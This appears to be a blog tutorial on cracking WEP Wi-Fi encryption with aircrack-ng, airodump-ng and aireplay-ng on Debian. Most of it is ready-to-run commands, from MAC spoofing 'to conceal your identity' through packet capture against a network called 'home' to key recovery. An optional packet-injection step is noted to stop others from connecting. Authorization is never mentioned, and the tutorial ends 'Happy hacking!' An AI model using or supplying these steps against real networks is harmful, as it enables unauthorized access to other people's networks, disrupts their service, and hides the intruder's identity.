1.) WEP is a weak encryption system. In this tutorial, we will crack WEP encryption using airmon-ng and obtain the key.
2.) You will need a wireless card, airmon-ng and macchanger. I’m assuming that you already have a wireless card setup properly in LINUX Debian Distribution. Otherwise you will need to use ndiswrapper to set it up. See my blog on how to setup a “Wireless Bridge Router with Debian” to do this.
3.) Inastall airmon-ng and macchanger
apt-get install aircrack-ng
apt-get install macchanger
4.) To get a list of network interfaces. The screen shot below has the interface and drivername. I’m using the Trendnet TEW228-PI wireless card with the dirver name is rt18180. The interface is wlan0.
Results for airmon-ng
5.) Stop airmon, bringdown the network and change your network card’s mac address to conceal your identity. Replace (interface) with the interface name found in the screen shot above.
airmon-ng stop (interface)
ifconfig (interface) down
macchanger –mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)
My wireless card is configured to wlan0 so below is the statement.
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger –mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
6.) Check out which wireless networks is avialble.
if wlan0 is your interface,
Provides a list of available wireless networks
7.) The screen shot above contains the BSSID (That’s the MAC accdress of the router), PWR is the signal strength., #Data is the number of data packets read, CH is channel, MB is the transfer rate, ENC is the type of Encryption. In this excercise, we are only hacking WEP. WPA is a much stronger encryption and requires a different process to hack it. So we want to hack the “home” (ESSID) network. We do so by typing in the follwing.
airodump-ng -c (channel) -w (file name) –bssid (bssid) (interface)
Fill out the channel and bssid from the aprodump-ng (interface) results. Replace interface with your interface and filename is the file to write the captured data packets into. In my case, I ran the following.
airodump-ng -c 6 -w home –bssid 00:12:0E:3C:BC:60 wlan0
Starts capturing data into a file
8.) #Data is the field we are interested in. It tells you how many data has been captured and written to the file. You will need at least 15,000 #Data to crack the WEP. I was able to crack “home” with 25,000 #Data leaving the computer running for 10 hours. This is the passive method of hacking. If you want to speed things up, you can force packets into the system but the disadvantage is it’s not that much faster and it prevents anybody from connecting to the network. See Active Hacking below for more info.
9.) Finally after obtaining enough #Data, it’s time to get the key. Run this command.
aircrack-ng -b (bssid) (file name-01.cap)
in my case I had to type the follwoing:
aircrack-ng -b 00:12:0E:3C:BC:60 home-03.cap
10.) It should display something like this if the key is found
KEY FOUND! [ 99:83:4E:00:38 ] (ASCII: ETND9 )
99834E0038 is the WEP key.
That’s it! Happy hacking!
1.) Continuing from #8., start a new window and type the following:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
2.) Then run the follwoing:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
3.) Go back to Step #9 After getting enough #Data